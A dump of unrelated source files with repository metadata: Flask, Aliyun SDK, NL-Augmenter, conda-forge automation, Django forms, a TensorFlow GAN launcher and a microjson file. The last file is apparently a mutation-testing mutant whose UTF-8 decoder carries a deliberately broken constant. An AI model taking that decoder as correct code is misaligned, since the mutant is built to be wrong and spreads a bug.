new_sum = binomials[i-1][0]-binomials[i-1][1]
binomials.append([new_sum,n[i]])
bins = []
for b in binomials:
bins.append(binomial_coefficient(b[0],b[1]))
return np.prod(bins)
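if __name__ == "__main__":
    # Sanity checks added for illustration; the values follow the standard
    # identities 5! = 120, C(5, 2) = 10 and 4!/(2!*1!*1!) = 12.
    assert factorial(5) == 120
    assert binomial_coefficient(5, 2) == 10
    assert multinomial([2, 1, 1]) == 12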
| 25.875 | 72 | 0.57971 |
4a2575f061410c28d0360ed40f76cf49b9db4be6 | 168 | py | Python | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null | adoteaqui/adoteaqui/ext/bcrypt.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | [
"MIT"
] | null | null | null |
from flask import Flask
from flask_bcrypt import Bcrypt
bcrypt = Bcrypt()
def init_app(app: Flask) -> None:
    bcrypt.init_app(app)
| 18.666667 | 38 | 0.761905 |
4a257626ef7a2dff9d1a9419ef8bb6383fa4ffc7 | 2,594 | py | Python | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-rtc/aliyunsdkrtc/request/v20180111/CreateSubscribeRequest.py | leafcoder/aliyun-openapi-python-sdk | 26b441ab37a5cda804de475fd5284bab699443f1 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkrtc.endpoint import endpoint_data
class CreateSubscribeRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'rtc', '2018-01-11', 'CreateSubscribe','rtc')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_Eventss(self):
return self.get_query_params().get('Events')
def set_Eventss(self, Eventss):
for depth1 in range(len(Eventss)):
if Eventss[depth1] is not None:
self.add_query_param('Events.' + str(depth1 + 1) , Eventss[depth1])
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_Userss(self):
return self.get_query_params().get('Users')
def set_Userss(self, Userss):
for depth1 in range(len(Userss)):
if Userss[depth1] is not None:
self.add_query_param('Users.' + str(depth1 + 1) , Userss[depth1])
def get_AppId(self):
return self.get_query_params().get('AppId')
def set_AppId(self,AppId):
self.add_query_param('AppId',AppId)
def get_CallbackUrl(self):
return self.get_query_params().get('CallbackUrl')
def set_CallbackUrl(self,CallbackUrl):
self.add_query_param('CallbackUrl',CallbackUrl)
def get_ChannelId(self):
return self.get_query_params().get('ChannelId')
def set_ChannelId(self,ChannelId):
		self.add_query_param('ChannelId',ChannelId)
| 33.25641 | 74 | 0.743254 |
4a25767157beebd1d3225c64c93e2f6109f97ad3 | 7,125 | py | Python | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null | transformations/contextual_meaning_perturbation/transformation.py | vadesecure/NL-Augmenter | f8419db984bd501ec0cc61d167f53fe3e2410f99 | [
"MIT"
] | null | null | null |
import itertools
import logging
import random
from collections import defaultdict
import spacy
from transformers import pipeline
from interfaces.SentenceOperation import SentenceOperation
from tasks.TaskTypes import TaskType
class ContextualMeaningPerturbation(SentenceOperation):
tasks = [
TaskType.TEXT_CLASSIFICATION,
TaskType.QUALITY_ESTIMATION,
]
languages = ["en", "de"]
keywords = [
"lexical",
"transformer-based",
"parser-based",
"tokenizer-required",
"natural",
"meaning-alteration",
"high-precision",
"high-coverage",
"high-generation",
]
heavy = True
def __init__(
self,
seed=0,
max_outputs=1,
top_k=10,
language="en",
pos_to_change=["ADV", "ADJ", "VERB", "NOUN", "PROPN"],
perturbation_rate=0.3,
):
super().__init__(seed, max_outputs=max_outputs)
self.seed = seed
self.max_outputs = max_outputs
random.seed(self.seed)
logging.info(
"Starting to load the cross-lingual XLM-R (base) model.\n"
)
self.unmasker = pipeline(
"fill-mask", model="xlm-roberta-base", top_k=top_k
)
logging.info(
"Completed loading the cross-lingual XLM-R (base) model.\n"
)
logging.info(
"Starting to load Spacy model ("
+ language
+ ") for retrieving linguistic features.\n"
)
if language == "en":
self.linguistic_pipeline = spacy.load("en_core_web_sm")
elif language == "de":
try:
self.linguistic_pipeline = spacy.load("de_core_news_sm")
except ImportError:
print(
"To perturb German text, please download SpaCy's German pipeline de_core_news_sm, \
for example by using the following command: python -m spacy download de_core_news_sm"
)
else:
raise NotImplementedError(
"As of now, only English and German are supported."
)
logging.info("Completed loading Spacy model.\n")
self.pos_to_change = pos_to_change
assert perturbation_rate <= 1 and perturbation_rate >= 0
        self.percentage = perturbation_rate  # How many of the eligible POS tags should be changed? Expects values between 0 and 1
def get_linguistic_features(self, input: str):
"""
Linguistic analysis of the input sentence.
Returns a list of tokens, POS tags and lemmatised tokens.
"""
tokens = []
pos_tags = []
lemmas = []
sentence = self.linguistic_pipeline(input)
for token in sentence:
tokens.append(token.text)
pos_tags.append(token.pos_)
            lemmas.append(token.lemma_)  # lemma_ is the string form; .lemma is an integer hash
return tokens, pos_tags, lemmas
def count_eligible_tokens(self, pos_tags):
"""
Returns the number of words that will be replaced.
"""
pos_count = 0
for pos in self.pos_to_change:
pos_count += pos_tags.count(pos)
return pos_count
def get_perturbation_candidates(self, input: str):
"""
Samples tokens that will be replaced.
Generates and returns the top k contextual replacement candidates.
"""
perturbation_dict = {}
tokens, pos_tags, lemmas = self.get_linguistic_features(input)
if self.count_eligible_tokens(pos_tags) == 0:
logging.warning(
"Warning: Sequence remained unchanged as it didn't include the following POS tags: {} \nAffected sequence: {}".format(
self.pos_to_change, input
)
)
num_word_swaps = 0
else:
num_word_swaps = max(
1,
round(self.percentage * self.count_eligible_tokens(pos_tags)),
)
        logging.info("%d tokens will be masked.", num_word_swaps)
tokens_to_mask = random.sample(
[
token
for i, token in enumerate(tokens)
if pos_tags[i] in self.pos_to_change
],
num_word_swaps,
)
for token in tokens_to_mask:
masked_input = input.replace(token, "<mask>", 1)
perturbation_dict[token] = self.unmasker(masked_input)
return perturbation_dict
def select_and_apply_perturbations(self, input: str):
"""
Applies perturbations and returns the perturbed sentence
By default, the best fitting candidate is used.
If the top k candidate list includes a token with the same POS tag but different word family
as the original token, it will be used instead of the default.
"""
perturbation_dict = self.get_perturbation_candidates(input)
tokens, pos_tags, lemmas = self.get_linguistic_features(input)
replacement_dict = defaultdict(list)
for original_token in perturbation_dict:
# Replace with the first best choice in case no better candidate is found
for replacement_candidate in perturbation_dict[original_token]:
p_tokens, p_pos_tags, p_lemmas = self.get_linguistic_features(
replacement_candidate["sequence"]
)
# The selected word should have the same POS tag but originate from a different word family
if p_lemmas != lemmas and p_pos_tags == pos_tags:
replacement_dict[original_token].append(
replacement_candidate["token_str"]
)
# break
if original_token not in replacement_dict.keys():
replacement_dict[original_token].append(
perturbation_dict[original_token][0]["token_str"]
)
logging.info("The following words will be replaced:\n")
for key in replacement_dict:
            logging.info(
                "Replacement candidates for %s include %s",
                key,
                replacement_dict[key],
            )
# Calculate how many perturbations will be returned
keys, values = zip(*replacement_dict.items())
permutations = list(itertools.product(*values))
num_perturbations = min(self.max_outputs, len(permutations))
perturbed_sentences = []
for i in range(num_perturbations):
perturbed_sentence = input
for j in range(len(keys)):
perturbed_sentence = perturbed_sentence.replace(
keys[j], permutations[i][j], 1
)
perturbed_sentences.append(perturbed_sentence)
return perturbed_sentences
def generate(self, sentence: str):
perturbation_sentences = self.select_and_apply_perturbations(sentence)
logging.info("Original:/t", sentence)
logging.info("Perturbation:/t", perturbation_sentences)
return perturbation_sentences
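if __name__ == "__main__":
    # Illustrative entry point (not part of the NL-Augmenter test suite): the
    # first run downloads XLM-R and the English spaCy pipeline, so it is heavy;
    # max_outputs bounds how many perturbed sentences come back.
    op = ContextualMeaningPerturbation(language="en", max_outputs=2)
    print(op.generate("The quick brown fox jumps over the lazy dog."))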
| 35.984848 | 134 | 0.595789 |
4a2577b9d6bdbcff6a0d5f99bb2aad8e5ec77981 | 3,186 | py | Python | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | null | null | null | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | null | null | null | mainsite/data.py | jazzyeagle/chatbot_website | 47da27f85907b5f3f7ea94bffd343a6322b8f39a | [
"BSD-3-Clause"
] | 1 | 2022-03-05T15:08:45.000Z | 2022-03-05T15:08:45.000Z |
from django.db.models.functions import Lower
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from mainsite.models import *
from show.models import *
from users import data
from result import ResultFlag, Result
def index(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
# Uses the user page as default, so pull same data
page_data = data.user(request, user.username)
if page_data.isOk:
return Result(ResultFlag.Ok, page_data.get() )
else:
return Result(ResultFlag.Error, 'Could not get User data')
else:
user = None
return Result(ResultFlag.Ok, {})
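def unwrap_or_raise(result):
    # Helper sketch (added for illustration): mirrors how index() consumes
    # Result values above; `.isOk` and `.get()` are assumed to be the API of
    # the custom result module imported at the top.
    if result.isOk:
        return result.get()
    raise ValueError(result.get())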
def tours(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'tours': Tour.objects.all().order_by('month'),
'user': user
})
def venues(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'venues': Venue.objects.all().order_by('date'),
'user': user
})
def songs(request):
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, { 'songs': Song.objects.all().order_by(Lower('title')),
'user': user
})
def tour(request, tour_name):
tour = Tour.objects.get(url_slug=tour_name)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, {
'tour': tour,
'venues': tour.venue_set.order_by('date'),
'user': user
})
def venue(request, tour_name, venue_name):
venue = Venue.objects.get(url_slug=venue_name)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
return Result(ResultFlag.Ok, {
'venue': venue,
'songs': venue.song_set.order_by('track_number'),
'user': user
})
def song(request, tour_name, venue_name, song_title):
song = Song.objects.get(url_slug=song_title)
if 'user_id' in request.session:
user = User.objects.get(id=request.session['user_id'])
else:
user = None
data = { 'song': song,
'user': user
}
for rt in Command.objects.all():
data[rt.text.replace(' ', '_')] = song.song_requests.filter(command=rt)
for s in data['instrument']:
print(s.played_by.username)
return Result(ResultFlag.Ok, data)
| 32.845361 | 88 | 0.542687 |
4a257889613aecb943ca4a10604834bec432b45f | 2,365 | py | Python | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null | typer.py | Jaasim2008/Ultra-Typer-V2 | 14c5b8994fb0b3deab2bad1cda685ffc92ce61fe | [
"MIT"
] | null | null | null |
from tkinter import *
from tkinter import messagebox
from json_manager import *
from pynput.keyboard import Key, Controller
import time
root = Tk()
root.title('Ultra Typer v2')
root.geometry('700x400')
my_icon = PhotoImage(file='keyboard.png')
root.iconphoto(False, my_icon)
dark_col = '#3d3d3d'
root.config(bg=dark_col)
frame1 = Frame(root, bg=dark_col)
frame1.pack(fill=BOTH)
def page_two():
frame2 = Frame(bg=dark_col)
frame2.pack(fill=BOTH)
def start_type():
new_module = Json_Manager('settings.json')
word_data = new_module.get_data('word')
number_data = new_module.get_data('number')
keyb = Controller()
time.sleep(5)
for x in range(int(number_data)):
time.sleep(0.1)
for char in word_data:
keyb.press(char)
keyb.release(char)
messagebox.showinfo('Done!', 'Finished Typing!')
new_module.clear_data()
btn2 = Button(frame2, bg=dark_col, text='Start Typing ( start in 5 sec )', font=('Arial Italic', 20), relief=SUNKEN
, bd=0, command=start_type, fg='white')
btn2.pack(pady=20)
btn3 = Button(frame2, bg=dark_col, text='Quit App', font=('Arial Italic', 20), relief=SUNKEN, bd=0,
command=root.destroy, fg='white')
btn3.pack(pady=20)
def save_and_move():
the_word = ent1.get()
the_number = ent2.get()
new_mod = Json_Manager('settings.json')
new_mod.write_data('word', the_word)
new_mod.append_data('number', the_number)
frame1.pack_forget()
page_two()
lbl = Label(frame1, bg=dark_col, text='Enter Word :', font=('Arial Italic', 17), fg='white')
lbl.pack(pady=20)
ent1 = Entry(frame1, bg=dark_col, bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='white')
ent1.pack(pady=20)
lbl2 = Label(frame1, bg=dark_col, text='Enter Number Of Times The Word Should Be Typed :', fg='white', bd=0
, font=('Arial Italic', 17))
lbl2.pack(pady=20)
ent2 = Entry(frame1, bg=dark_col, bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='white')
ent2.pack(pady=20)
btn1 = Button(frame1, bg=dark_col, text='Submit Data', bd=1, relief=SUNKEN, font=('Arial Italic', 20), fg='orange'
, command=save_and_move)
btn1.pack(pady=20, side=BOTTOM)
root.mainloop()
| 31.118421 | 120 | 0.629598 |
4a2578bb97cb1d5070a67bb8a82d675e22e581b2 | 1,594 | py | Python | main.py | HaoZhang1018/MFF-GAN_Inf2020 | 2f674c8aa00613e4637b8b12c772323b872fa9b4 | [
"MIT"
] | 12 | 2020-10-19T08:45:08.000Z | 2022-03-08T12:56:08.000Z | main.py | HaoZhang1018/MFF-GAN_TF2 | 0a67caadac0558146da620058f419e630063d93d | [
"MIT"
] | 2 | 2020-12-01T22:32:49.000Z | 2022-01-29T09:51:41.000Z | main.py | HaoZhang1018/MFF-GAN_TF2 | 0a67caadac0558146da620058f419e630063d93d | [
"MIT"
] | 3 | 2020-10-19T08:45:31.000Z | 2022-02-10T07:56:09.000Z |
# -*- coding: utf-8 -*-
from model import CGAN
from utils import input_setup
import numpy as np
import tensorflow as tf
import pprint
import os
flags = tf.app.flags
flags.DEFINE_integer("epoch", 20, "Number of epoch [10]")
flags.DEFINE_integer("batch_size", 32, "The size of batch images [128]")
flags.DEFINE_integer("image_size", 60, "The size of image to use [33]")
flags.DEFINE_float("learning_rate", 1e-4, "The learning rate of gradient descent algorithm [1e-4]")
flags.DEFINE_integer("c_dim", 1, "Dimension of image color. [1]")
flags.DEFINE_integer("scale", 3, "The size of scale factor for preprocessing input image [3]")
flags.DEFINE_integer("stride",10, "The size of stride to apply input image [14]")
flags.DEFINE_string("checkpoint_dir", "checkpoint", "Name of checkpoint directory [checkpoint]")
flags.DEFINE_string("sample_dir", "sample", "Name of sample directory [sample]")
flags.DEFINE_string("summary_dir", "log", "Name of log directory [log]")
flags.DEFINE_boolean("is_train", True, "True for training, False for testing [True]")
FLAGS = flags.FLAGS
pp = pprint.PrettyPrinter()
def main(_):
pp.pprint(flags.FLAGS.__flags)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
with tf.Session() as sess:
srcnn = CGAN(sess,
image_size=FLAGS.image_size,
batch_size=FLAGS.batch_size,
c_dim=FLAGS.c_dim,
checkpoint_dir=FLAGS.checkpoint_dir,
sample_dir=FLAGS.sample_dir)
srcnn.train(FLAGS)
if __name__ == '__main__':
tf.app.run()
| 34.652174 | 99 | 0.699498 |
4a2578d409ea7556318f5e88e383dc68ca7ad965 | 8,735 | py | Python | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null | scripts/regenerate_feedstock.py | janschulz/conda-forge.github.io | 0d73991264b778e6759ceec8bea9ff915595ba78 | [
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env conda-execute
"""
This script is used to manage the feedstocks by regenerating the content (from conda-smithy).
The first feedstock found which needed re-generating will then have a branch pushed and a pull request open.
Whilst it is out of date, the following pseudo code was used to outline this module:
for feedstock in feedstocks:
checkout a clean branch named "feedstock_rerender" from upstream/master
conda smithy rerender feedstock
if feedstock has diffs:
if diff between origin/feedstock_redender and "feedstock_rerender":
force push origin/feedstock_rerender
if pull request for branch:
add a comment
else:
create a pull request
break
"""
# conda execute
# env:
# - python
# - conda-smithy
# - gitpython
# - pygithub
# channels:
# - conda-forge
# run_with: python
import os
import time
import argparse
from contextlib import contextmanager
import textwrap
import random
import git
import github
import conda_smithy.github
import conda_smithy.configure_feedstock
import conda_smithy
import conda_smithy.feedstocks as feedstocks
parser = argparse.ArgumentParser(description='Propose a feedstock update.')
parser.add_argument('--feedstocks-dir', help="The location of the feedstocks.",
default="~/dev/conda-forge/feedstocks")
args = parser.parse_args()
feedstocks_dir = os.path.expanduser(args.feedstocks_dir)
feedstocks.clone_all('conda-forge', feedstocks_dir)
feedstocks.fetch_feedstocks(feedstocks_dir)
# TODO: What about feedstocks that get removed?
randomised_feedstocks = list(feedstocks.cloned_feedstocks(feedstocks_dir))
# Shuffle is in-place. :(
random.shuffle(randomised_feedstocks)
gh_token = conda_smithy.github.gh_token()
gh = github.Github(gh_token)
gh_me = gh.get_user()
if gh_me.login != 'conda-forge-admin':
raise ValueError("The github token isn't that of conda-forge-admin (it's "
"for {}), I'm going to have to bail.".format(gh_me.login))
gh_forge = gh.get_organization('conda-forge')
def my_repos(gh_user):
"""
List all of my repos.
See https://github.com/PyGithub/PyGithub/issues/390 for rationale.
"""
return github.PaginatedList.PaginatedList(
github.Repository.Repository,
gh_user._requester,
gh_user.url + "/repos",
dict(affiliation="owner"))
def list_pulls(repo, state='open', head=None):
"""
List all of the pull requests that match the given critera.
At the time of writing, pygithub doesn't allow you to specify the head,
so I had to create this function.
"""
url_parameters = dict(state=state)
if head:
url_parameters['head'] = head
return github.PaginatedList.PaginatedList(
github.PullRequest.PullRequest,
repo._requester,
repo.url + "/pulls",
url_parameters
)
# Set to false to debug.
if True:
print("Collecting list of conda-forge-admin repos...")
my_repos = {repo.name: repo for repo in my_repos(gh_me)}
print("Collecting list of conda-forge repos...")
forge_repos = {repo.name: repo for repo in gh_forge.get_repos()}
else:
# For debugging, we turn our attention to a single feedstock.
debug_name = 'pyproj-feedstock'
my_repos = {debug_name: gh_me.get_repo(debug_name)}
forge_repos = {debug_name: gh_me.get_repo(debug_name)}
randomised_feedstocks = [feedstock for feedstock in randomised_feedstocks
if feedstock.name == debug_name]
@contextmanager
def tmp_remote(repo, remote_name, url):
if remote_name in [remote.name for remote in repo.remotes]:
repo.delete_remote(remote_name)
remote = repo.create_remote(remote_name, url)
yield remote
repo.delete_remote(remote_name)
for feedstock in randomised_feedstocks:
print('Checking {}'.format(feedstock.name))
if feedstock.name not in forge_repos:
raise ValueError("There exists a feedstock ({}) which isn't in the "
"conda-forge org.".format(feedstock.name))
if feedstock.name not in my_repos:
forge_repo = gh_forge.get_repo(feedstock.name)
print('Forking {}'.format(feedstock.name))
gh_me.create_fork(forge_repo)
my_repos[feedstock.name] = gh_me.get_repo(feedstock.name)
clone = git.Repo(feedstock.directory)
admin_fork = my_repos[feedstock.name]
forge_feedstock = forge_repos[feedstock.name]
# Put an appropriate conda-forge-admin remote in place.
with tmp_remote(clone, 'conda-forge-admin',
admin_fork.clone_url.replace('https://',
'https://{}@'.format(gh_token))) as remote:
remote.fetch()
clone.remotes.upstream.fetch()
if 'feedstock_rerender' in clone.heads:
clone.heads.master.checkout()
clone.delete_head('feedstock_rerender', '-D')
clone.create_head('feedstock_rerender', clone.remotes.upstream.refs.master).set_tracking_branch(clone.remotes.upstream.refs.master)
# Reset the working tree to a clean state.
clone.head.reset(index=True, working_tree=True)
clone.heads.feedstock_rerender.checkout()
# Technically, we can do whatever we like to the feedstock now. Let's just
# update the feedstock though. For examples of other things that *have* been
# done here - once upon a time @pelson modified the conda-forge.yaml config
# item for every single feedstock, and submitted PRs for every project.
conda_smithy.configure_feedstock.main(feedstock.directory)
if not clone.is_dirty():
# We don't need this feedstock - it is slap-bang up to date. :)
print("{} was checked, and is up-to-date".format(feedstock.name))
continue
# if no changes, continue. Else, commit, push and pull request.
clone.git.add('-A')
commit = clone.index.commit("MNT: Updated the feedstock for conda-smithy version {}.".format(conda_smithy.__version__))
if 'feedstock_rerender' in remote.refs:
diff = commit.diff(remote.refs.feedstock_rerender)
if not diff:
# There were no differences between this and the remote feedstock_rerender, so just continue.
print("{} was checked, and whilst there are changes needed, the PR is up-to-date".format(feedstock.name))
continue
remote.push('+feedstock_rerender')
rerender_pulls = list(list_pulls(forge_feedstock, state='open', head='conda-forge-admin:feedstock_rerender'))
if rerender_pulls:
pull = rerender_pulls[0]
msg = textwrap.dedent("""
It's the friendly automated conda-forge-admin here again.
Just to let you know, I've updated this PR so that it has the latest render from conda-smithy (version {}).
If there are no problems with it, please consider merging this PR.
If there are concerns about it, please ping the 'conda-forge/core' team (using the @ notation in a comment).
Thanks!
""".format(conda_smithy.__version__))
pull.create_issue_comment(msg)
print('Updated PR on {}'.format(forge_feedstock.html_url))
else:
# TODO: Should there be one for each branch in the repo?
msg = textwrap.dedent("""
Hi! This is the friendly conda-forge-admin automated user.
I've re-rendered this feedstock with the latest version of conda-smithy ({}) and noticed some changes.
If the changes look good, then please go ahead and merge this PR.
If you have any questions about the changes though, please feel free to ping the 'conda-forge/core' team (using the @ notation in a comment).
Remember, for any changes to the recipe you would normally need to increment the version or the build number of the package.
Since this is an infrastructural change, we don't actually need/want a new version to be uploaded to anaconda.org/conda-forge, so the version and build/number are left unchanged.
Thanks!
""".format(conda_smithy.__version__))
forge_feedstock.create_pull(title='MNT: Re-render the feedstock',
body=msg,
head="conda-forge-admin:feedstock_rerender", base="master")
print('Opened PR on {}'.format(forge_feedstock.html_url))
# Stop processing any more feedstocks until the next time the script is run.
break
| 38.995536 | 194 | 0.666857 |
4a2578e257354af6778382a0bfc368377e2379ac | 1,423 | py | Python | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | 1 | 2020-10-31T16:19:23.000Z | 2020-10-31T16:19:23.000Z | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | null | null | null | area51/forms.py | tailorv/neighbourshood | f9470ba1f9bb8c995d0b8ae93e90316285226026 | [
"Unlicense"
] | null | null | null |
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile, Post, Business, Services, Neighbourhood
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_photo', 'bio']
class PostUploadForm(forms.ModelForm):
class Meta:
model = Post
fields = ['title', 'post']
def form_valid(self, form):
form.instance.user = self.request.profile
return super().form_valid(form)
class BizUploadForm(forms.ModelForm):
class Meta:
model = Business
fields = ['biz_name', 'biz_description', 'biz_digits', 'biz_email' ]
def form_valid(self, form):
form.instance.user = self.request.profile
return super().form_valid(form)
class HoodForm(forms.ModelForm):
class Meta:
model = Neighbourhood
fields = ['hood_name', 'hood_location', 'family_size']
def form_valid(self, form):
form.instance.user = self.request.profile
        return super().form_valid(form)
| 28.46 | 76 | 0.663387 |
4a257ce263366e958e45f853c44bd1e43701491e | 8,310 | py | Python | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 90 | 2015-04-07T10:26:53.000Z | 2022-03-07T15:14:57.000Z | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 14 | 2015-10-13T16:25:59.000Z | 2021-01-21T18:31:03.000Z | examples/microjson/mutants/CRP_Num_mutant_1486201294.py | Anirban166/tstl | 73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e | [
"Apache-2.0"
] | 32 | 2015-04-07T10:41:29.000Z | 2022-02-26T05:17:28.000Z |
import math
import StringIO
import types
__pychecker__ = 'no-returnvalues'
WS = set([' ', '\t', '\r', '\n', '\x08', '\x0c'])
DIGITS = set([str(i) for i in range(0, 10)])
NUMSTART = DIGITS.union(['.', '-', '+'])
NUMCHARS = NUMSTART.union(['e', 'E'])
ESC_MAP = {'n': '\n', 't': '\t', 'r': '\r', 'b': '\x08', 'f': '\x0c'}
REV_ESC_MAP = dict([(_v, _k) for (_k, _v) in ESC_MAP.items()] + [('"', '"')])
E_BYTES = 'input string must be type str containing ASCII or UTF-8 bytes'
E_MALF = 'malformed JSON data'
E_TRUNC = 'truncated JSON data'
E_BOOL = 'expected boolean'
E_NULL = 'expected null'
E_LITEM = 'expected list item'
E_DKEY = 'expected key'
E_COLON = 'missing colon after key'
E_EMPTY = 'found empty string, not valid JSON data'
E_BADESC = 'bad escape character found'
E_UNSUPP = 'unsupported type "%s" cannot be JSON-encoded'
E_BADFLOAT = 'cannot emit floating point value "%s"'
NEG_INF = float('-inf')
POS_INF = float('inf')
class JSONError(Exception):
def __init__(self, msg, stm=None, pos=0):
if stm:
msg += ' at position %d, "%s"' % (pos, repr(stm.substr(pos, 32)))
Exception.__init__(self, msg)
class JSONStream(object):
def __init__(self, data):
self._stm = StringIO.StringIO(data)
@property
def pos(self):
return self._stm.pos
@property
def len(self):
return self._stm.len
def getvalue(self):
return self._stm.getvalue()
def skipspaces(self):
'post-cond: read pointer will be over first non-WS char'
self._skip(lambda c: (c not in WS))
def _skip(self, stopcond):
while True:
c = self.peek()
if (stopcond(c) or (c == '')):
break
self.next()
def next(self, size=1):
return self._stm.read(size)
def next_ord(self):
return ord(self.next())
def peek(self):
if (self.pos == self.len):
return ''
return self.getvalue()[self.pos]
def substr(self, pos, length):
return self.getvalue()[pos:pos + length]
def _decode_utf8(c0, stm):
c0 = ord(c0)
r = 65533
nc = stm.next_ord
    if (c0 & 224 == 192):
        r = ((c0 & 31) << 6) + (nc() & 63)
    elif (c0 & 240 == 224):
        r = ((c0 & 15) << 12) + ((nc() & 63) << 6) + (nc() & 63)
    elif (c0 & 0 == 240):
        r = ((c0 & 7) << 18) + ((nc() & 63) << 12) + ((nc() & 63) << 6) + (nc() & 63)
return unichr(r)
def decode_escape(c, stm):
v = ESC_MAP.get(c, None)
if (v is not None):
return v
elif (c != 'u'):
return c
sv = 12
r = 0
for _ in range(0, 4):
r |= int(stm.next(), 16) << sv
sv -= 4
return unichr(r)
def _from_json_string(stm):
stm.next()
r = []
while True:
c = stm.next()
if (c == ''):
            raise JSONError(E_TRUNC, stm, stm.pos - 1)
elif (c == '\\'):
c = stm.next()
r.append(decode_escape(c, stm))
elif (c == '"'):
return ''.join(r)
elif (c > '\x7f'):
r.append(_decode_utf8(c, stm))
else:
r.append(c)
def _from_json_fixed(stm, expected, value, errmsg):
off = len(expected)
pos = stm.pos
if (stm.substr(pos, off) == expected):
stm.next(off)
return value
    raise JSONError(errmsg, stm, pos)
def _from_json_number(stm):
is_float = 0
saw_exp = 0
pos = stm.pos
while True:
c = stm.peek()
if (c not in NUMCHARS):
break
elif ((c == '-') and (not saw_exp)):
pass
elif (c in ('.', 'e', 'E')):
is_float = 1
if (c in ('e', 'E')):
saw_exp = 1
stm.next()
s = stm.substr(pos, stm.pos - pos)
if is_float:
return float(s)
return long(s)
def _from_json_list(stm):
stm.next()
result = []
pos = stm.pos
while True:
stm.skipspaces()
c = stm.peek()
